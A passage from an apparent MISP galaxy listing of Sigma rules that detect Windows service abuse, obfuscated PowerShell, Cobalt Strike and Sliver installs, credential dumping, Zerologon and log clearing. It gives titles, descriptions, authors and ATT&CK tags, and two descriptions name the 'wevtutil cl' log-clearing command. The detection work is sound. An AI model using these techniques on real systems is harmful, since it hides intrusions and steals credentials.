falsepositive ['Unknown']
filename win_system_invoke_obfuscation_via_use_rundll32_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Windows Service Terminated With Error

Detects Windows services that were terminated with an error, for whatever reason

Internal MISP references

UUID acfa2210-0d71-4eeb-b477-afab494d596c which can be used as unique global reference for Windows Service Terminated With Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/14
falsepositive ['False positives could occur since service termination could happen due to multiple reasons']
filename win_system_service_terminated_error_generic.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

PowerShell Scripts Installed as Services

Detects a PowerShell script installed as a service

Internal MISP references

UUID a2e5019d-a658-4c6a-92bf-7197b54e2cae which can be used as unique global reference for PowerShell Scripts Installed as Services in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova
creation_date 2020/10/06
falsepositive ['Unknown']
filename win_system_powershell_script_installed_as_service.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

CSExec Service Installation

Detects CSExec service installation and execution events

Internal MISP references

UUID a27e5fa9-c35e-4e3d-b7e0-1ce2af66ad12 which can be used as unique global reference for CSExec Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/07
falsepositive ['Unknown']
filename win_system_service_install_csexecsvc.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

CobaltStrike Service Installations - System

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement

Internal MISP references

UUID 5a105d34-05fc-401e-8553-272b45c1522d which can be used as unique global reference for CobaltStrike Service Installations - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Wojciech Lesicki
creation_date 2021/05/26
falsepositive ['Unknown']
filename win_system_cobaltstrike_service_installs.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.lateral_movement', 'attack.t1021.002', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Suspicious Service Installation

Detects suspicious service installation commands

Internal MISP references

UUID 1d61f71d-59d2-479e-9562-4ff5f4ead16b which can be used as unique global reference for Suspicious Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2022/03/18
falsepositive ['Unknown']
filename win_system_service_install_susp.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'car.2013-09-005', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation COMPRESS OBFUSCATION - System

Detects obfuscated PowerShell via COMPRESS OBFUSCATION

Internal MISP references

UUID 175997c5-803c-4b08-8bb0-70b099f47595 which can be used as unique global reference for Invoke-Obfuscation COMPRESS OBFUSCATION - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_via_compress_services.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

HackTool Service Registration or Execution

Detects the registration or execution of services associated with known hack tools

Internal MISP references

UUID d26ce60c-2151-403c-9a42-49420d87b5e4 which can be used as unique global reference for HackTool Service Registration or Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/21
falsepositive ['Unknown']
filename win_system_service_install_hacktools.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation STDIN+ Launcher - System

Detects obfuscated use of stdin to execute PowerShell

Internal MISP references

UUID 72862bf2-0eb1-11eb-adc1-0242ac120002 which can be used as unique global reference for Invoke-Obfuscation STDIN+ Launcher - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_stdin_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Moriya Rootkit - System

Detects the use of the Moriya rootkit as described in Securelist's Operation TunnelSnake report

Internal MISP references

UUID 25b9c01c-350d-4b95-bed1-836d04a4f324 which can be used as unique global reference for Moriya Rootkit - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021/05/06
falsepositive ['Unknown']
filename win_system_moriya_rootkit.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

ProcessHacker Privilege Elevation

Detects the ProcessHacker tool elevating its privileges to a very high level

Internal MISP references

UUID c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9 which can be used as unique global reference for ProcessHacker Privilege Elevation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/05/27
falsepositive ['Unlikely']
filename win_system_service_install_pua_proceshacker.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Mesh Agent Service Installation

Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers

Internal MISP references

UUID e0d1ad53-c7eb-48ec-a87a-72393cc6cedc which can be used as unique global reference for Mesh Agent Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/28
falsepositive ['Legitimate use of the tool']
filename win_system_service_install_mesh_agent.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Sliver C2 Default Service Installation

Detects known malicious service installations that appear in cases in which a Sliver implant executes the PsExec command

Internal MISP references

UUID 31c51af6-e7aa-4da7-84d4-8f32cc580af2 which can be used as unique global reference for Sliver C2 Default Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/25
falsepositive ['Unknown']
filename win_system_service_install_sliver.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Obfuscated IEX Invocation - System

Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework, based on the code block linked in the references

Internal MISP references

UUID 51aa9387-1c53-4153-91cc-d73c59ae1ca9 which can be used as unique global reference for Invoke-Obfuscation Obfuscated IEX Invocation - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniel Bohannon (@Mandiant/@FireEye), oscd.community
creation_date 2019/11/08
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_obfuscated_iex_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR+ Launcher - System

Detects obfuscated use of environment variables to execute PowerShell

Internal MISP references

UUID 8ca7004b-e620-4ecb-870e-86129b5b8e75 which can be used as unique global reference for Invoke-Obfuscation VAR+ Launcher - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_var_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

New PDQDeploy Service - Server Side

Detects a PDQDeploy service installation, which indicates that PDQDeploy was installed on the machine. PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines.

Internal MISP references

UUID ee9ca27c-9bd7-4cee-9b01-6e906be7cae3 which can be used as unique global reference for New PDQDeploy Service - Server Side in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/22
falsepositive ['Legitimate use of the tool']
filename win_system_service_install_pdqdeploy.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Service Installation in Suspicious Folder

Detects service installation in the suspicious AppData folder

Internal MISP references

UUID 5e993621-67d4-488a-b9ae-b420d08b96cb which can be used as unique global reference for Service Installation in Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/03/18
falsepositive ['Unknown']
filename win_system_susp_service_installation_folder.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'car.2013-09-005', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System

Detects obfuscated PowerShell via VAR++ LAUNCHER

Internal MISP references

UUID 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 which can be used as unique global reference for Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_via_var_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

RTCore Suspicious Service Installation

Detects the installation of the RTCore service, which could indicate abuse of the vulnerable Micro-Star MSI Afterburner driver

Internal MISP references

UUID 91c49341-e2ef-40c0-ac45-49ec5c3fe26c which can be used as unique global reference for RTCore Suspicious Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/30
falsepositive ['Unknown']
filename win_system_susp_rtcore64_service_install.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence']

Service Installed By Unusual Client - System

Detects a service installed by a client which has PID 0 or whose parent has PID 0

Internal MISP references

UUID 71c276aa-49cd-43d2-b920-2dcd3e6962d5 which can be used as unique global reference for Service Installed By Unusual Client - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Elastic (idea)
creation_date 2022/09/15
falsepositive ['Unknown']
filename win_system_service_install_sups_unusal_client.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543']
Related clusters

To see the related clusters, click here.

PsExec Service Installation

Detects PsExec service installation and execution events

Internal MISP references

UUID 42c575ea-e41e-41f1-b248-8093c3e82a28 which can be used as unique global reference for PsExec Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/06/12
falsepositive ['Unknown']
filename win_system_service_install_sysinternals_psexec.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

NetSupport Manager Service Install

Detects NetSupport Manager service installation on the target system.

Internal MISP references

UUID 2d510d8d-912b-45c5-b1df-36faa3d8c3f4 which can be used as unique global reference for NetSupport Manager Service Install in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/31
falsepositive ['Legitimate use of the tool']
filename win_system_service_install_netsupport_manager.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence']

Windows Defender Threat Detection Disabled - Service

Detects that the "Windows Defender Threat Protection" service has been disabled

Internal MISP references

UUID 6c0a7755-6d31-44fa-80e1-133e57752680 which can be used as unique global reference for Windows Defender Threat Detection Disabled - Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský, frack113
creation_date 2020/07/28
falsepositive ['Administrator actions', 'Auto updates of Windows Defender causes restarts']
filename win_system_defender_disabled.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Important Windows Service Terminated With Error

Detects important or interesting Windows services that were terminated, for whatever reason

Internal MISP references

UUID d6b5520d-3934-48b4-928c-2aa3f92d6963 which can be used as unique global reference for Important Windows Service Terminated With Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/14
falsepositive ['Rare false positives could occur since service termination could happen due to multiple reasons']
filename win_system_service_terminated_error_important.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Service Installation Script

Detects suspicious service installation scripts

Internal MISP references

UUID 70f00d10-60b2-4f34-b9a0-dc3df3fe762a which can be used as unique global reference for Suspicious Service Installation Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/03/18
falsepositive ['Unknown']
filename win_system_susp_service_installation_script.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'car.2013-09-005', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

TacticalRMM Service Installation

Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.

Internal MISP references

UUID 4bb79b62-ef12-4861-981d-2aab43fab642 which can be used as unique global reference for TacticalRMM Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/28
falsepositive ['Legitimate use of the tool']
filename win_system_service_install_tacticalrmm.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Credential Dumping Tools Service Execution - System

Detects well-known credential dumping tools execution via service execution events

Internal MISP references

UUID 4976aa50-8f41-45c6-8b15-ab3fc10e79ed which can be used as unique global reference for Credential Dumping Tools Service Execution - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
creation_date 2017/03/05
falsepositive ['Legitimate Administrator using credential dumping tool for password recovery']
filename win_system_mal_creddumper.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.execution', 'attack.t1003.001', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.005', 'attack.t1003.006', 'attack.t1569.002', 'attack.s0005']
Related clusters

To see the related clusters, click here.

KrbRelayUp Service Installation

Detects service creation by the KrbRelayUp tool, used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default setting)

Internal MISP references

UUID e97d9903-53b2-41fc-8cb9-889ed4093e80 which can be used as unique global reference for KrbRelayUp Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S, Tim Shelton
creation_date 2022/05/11
falsepositive ['Unknown']
filename win_system_krbrelayup_service_installation.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use MSHTA - System

Detects obfuscated PowerShell via the use of MSHTA in scripts

Internal MISP references

UUID 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 which can be used as unique global reference for Invoke-Obfuscation Via Use MSHTA - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_via_use_mshta_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Uncommon Service Installation Image Path

Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded PowerShell commands, temporary paths, etc.

Internal MISP references

UUID 26481afe-db26-4228-b264-25a29fe6efc7 which can be used as unique global reference for Uncommon Service Installation Image Path in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/18
falsepositive ['Unknown']
filename win_system_service_install_uncommon.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'car.2013-09-005', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Clip - System

Detects obfuscated PowerShell via the use of Clip.exe in scripts

Internal MISP references

UUID 63e3365d-4824-42d8-8b82-e56810fefa0c which can be used as unique global reference for Invoke-Obfuscation Via Use Clip - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_via_use_clip_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation CLIP+ Launcher - System

Detects obfuscated use of Clip.exe to execute PowerShell

Internal MISP references

UUID f7385ee2-0e0c-11eb-adc1-0242ac120002 which can be used as unique global reference for Invoke-Obfuscation CLIP+ Launcher - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_clip_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Tap Driver Installation

Detects the installation of well-known TAP software, a possible preparation for data exfiltration using tunnelling techniques

Internal MISP references

UUID 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 which can be used as unique global reference for Tap Driver Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, Ian Davis, oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate OpenVPN TAP installation']
filename win_system_service_install_tap_driver.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048']
Related clusters

To see the related clusters, click here.

Service Installation with Suspicious Folder Pattern

Detects service installation with suspicious folder patterns

Internal MISP references

UUID 1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2 which can be used as unique global reference for Service Installation with Suspicious Folder Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/03/18
falsepositive ['Unknown']
filename win_system_susp_service_installation_folder_pattern.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'car.2013-09-005', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Remote Utilities Host Service Install

Detects Remote Utilities Host service installation on the target system.

Internal MISP references

UUID 85cce894-dd8b-4427-a958-5cc47a4dc9b9 which can be used as unique global reference for Remote Utilities Host Service Install in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/31
falsepositive ['Legitimate use of the tool']
filename win_system_service_install_remote_utilities.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence']

Eventlog Cleared

Detects that one of the Windows event logs has been cleared, e.g. caused by execution of the "wevtutil cl" command

Internal MISP references

UUID a62b37e0-45d3-48d9-a517-90c1a1b0186b which can be used as unique global reference for Eventlog Cleared in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/01/10
falsepositive ['Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)', 'System provisioning (system reset before the golden image creation)']
filename win_system_eventlog_cleared.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.001', 'car.2016-04-002']
Related clusters

To see the related clusters, click here.

Important Windows Eventlog Cleared

Detects the clearing of one of the Windows core event logs, e.g. caused by execution of the "wevtutil cl" command

Internal MISP references

UUID 100ef69e-3327-481c-8e5c-6d80d9507556 which can be used as unique global reference for Important Windows Eventlog Cleared in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/05/17
falsepositive ['Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)', 'System provisioning (system reset before the golden image creation)']
filename win_system_susp_eventlog_cleared.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.001', 'car.2016-04-002']
Related clusters

To see the related clusters, click here.

Zerologon Exploitation Using Well-known Tools

This rule is designed to detect attempts to exploit the Zerologon (CVE-2020-1472) vulnerability using the mimikatz zerologon module or other exploits from a machine with the "kali" hostname.

Internal MISP references

UUID 18f37338-b9bd-4117-a039-280c81f7a596 which can be used as unique global reference for Zerologon Exploitation Using Well-known Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community
creation_date 2020/10/13
falsepositive No established falsepositives
filename win_system_possible_zerologon_exploitation_using_wellknown_tools.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.t1210', 'attack.lateral_movement']
Related clusters

To see the related clusters, click here.

Vulnerable Netlogon Secure Channel Connection Allowed

Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.

Internal MISP references

UUID a0cb7110-edf0-47a4-9177-541a4083128a which can be used as unique global reference for Vulnerable Netlogon Secure Channel Connection Allowed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author NVISO
creation_date 2020/09/15
falsepositive ['Unknown']
filename win_system_vul_cve_2020_1472.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548']
Related clusters

To see the related clusters, click here.

Sysmon Application Crashed

Detects application popup reporting a failure of the Sysmon service

Internal MISP references

UUID 4d7f1827-1637-4def-8d8a-fd254f9454df which can be used as unique global reference for Sysmon Application Crashed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Shelton
creation_date 2022/04/26
falsepositive ['Unknown']
filename win_system_application_sysmon_crash.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

KDC RC4-HMAC Downgrade CVE-2022-37966

Detects the exploitation of a security bypass and elevation of privilege vulnerability in authentication negotiation by means of a weak RC4-HMAC negotiation

Internal MISP references

UUID e6f81941-b1cd-4766-87db-9fc156f658ee which can be used as unique global reference for KDC RC4-HMAC Downgrade CVE-2022-37966 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/11/09
falsepositive ['Unknown']
filename win_system_kdcsvc_rc4_downgrade.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

No Suitable Encryption Key Found For Generating Kerberos Ticket

Detects errors when a target server doesn't have suitable keys for generating Kerberos tickets. This issue can occur, for example, when a service uses a user account or a computer account that is configured for only DES encryption on a computer running Windows 7, which has DES encryption for Kerberos authentication disabled.

Internal MISP references

UUID b1e0b3f5-b62e-41be-886a-daffde446ad4 which can be used as unique global reference for No Suitable Encryption Key Found For Generating Kerberos Ticket in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery
creation_date 2024/03/07
falsepositive ['Unknown']
filename win_system_kdcsvc_tgs_no_suitable_encryption_key_found.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

Certificate Use With No Strong Mapping

Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID). This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping. Events where the AccountName and the CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.

Internal MISP references

UUID 993c2665-e6ef-40e3-a62a-e1a97686af79 which can be used as unique global reference for Certificate Use With No Strong Mapping in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @br4dy5
creation_date 2023/10/09
falsepositive ['If prevalent in the environment, filter on events where the AccountName and CN of the Subject do not reference the same user', 'If prevalent in the environment, filter on CNs that end in a dollar sign indicating it is a machine name']
filename win_system_kdcsvc_cert_use_no_strong_mapping.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

Active Directory Certificate Services Denied Certificate Enrollment Request

Detects enrollment requests denied by Active Directory Certificate Services. Examples of such denials include issues with permissions on the certificate template or invalid signatures.

Internal MISP references

UUID 994bfd6d-0a2e-481e-a861-934069fcf5f5 which can be used as unique global reference for Active Directory Certificate Services Denied Certificate Enrollment Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery
creation_date 2024/03/07
falsepositive ['Unknown']
filename win_system_adcs_enrollment_request_denied.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1553.004']
Related clusters

To see the related clusters, click here.

DHCP Server Loaded the CallOut DLL

This rule detects a DHCP server that loaded a Callout DLL specified in the registry

Internal MISP references

UUID 13fc89a9-971e-4ca6-b9dc-aa53a445bf40 which can be used as unique global reference for DHCP Server Loaded the CallOut DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dimitrios Slamaris
creation_date 2017/05/15
falsepositive ['Unknown']
filename win_system_susp_dhcp_config.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

DHCP Server Error Failed Loading the CallOut DLL

This rule detects a DHCP server error in which a Callout DLL specified in the registry could not be loaded

Internal MISP references

UUID 75edd3fd-7146-48e5-9848-3013d7f0282c which can be used as unique global reference for DHCP Server Error Failed Loading the CallOut DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dimitrios Slamaris, @atc_project (fix)
creation_date 2017/05/15
falsepositive ['Unknown']
filename win_system_susp_dhcp_config_failed.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Suspicious Digital Signature Of AppX Package

Detects execution of AppX packages with known suspicious or malicious signatures

Internal MISP references

UUID b5aa7d60-c17e-4538-97de-09029d6cd76b which can be used as unique global reference for Suspicious Digital Signature Of AppX Package in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/16
falsepositive ['Unknown']
filename win_appxpackaging_om_sups_appx_signature.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

HybridConnectionManager Service Running

Rule to detect the Hybrid Connection Manager service running on an endpoint.

Internal MISP references

UUID b55d23e5-6821-44ff-8a6e-67218891e49f which can be used as unique global reference for HybridConnectionManager Service Running in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2021/04/12
falsepositive ['Legitimate use of Hybrid Connection Manager via Azure function apps.']
filename win_hybridconnectionmgr_svc_running.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1554']
Related clusters

To see the related clusters, click here.

Unsigned Binary Loaded From Suspicious Location

Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations

Internal MISP references

UUID 8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10 which can be used as unique global reference for Unsigned Binary Loaded From Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/03
falsepositive ['Unknown']
filename win_security_mitigations_unsigned_dll_from_susp_location.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Microsoft Defender Blocked from Loading Unsigned DLL

Detects the Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs, which may be an attempt to sideload an arbitrary DLL

Internal MISP references

UUID 0b0ea3cc-99c8-4730-9c53-45deee2a4c86 which can be used as unique global reference for Microsoft Defender Blocked from Loading Unsigned DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2022/08/02
falsepositive ['Unknown']
filename win_security_mitigations_defender_load_unsigned_dll.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

WMI Persistence

Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.

Internal MISP references

UUID 0b7889b4-5577-4521-a60a-3376ee7f9f7b which can be used as unique global reference for WMI Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
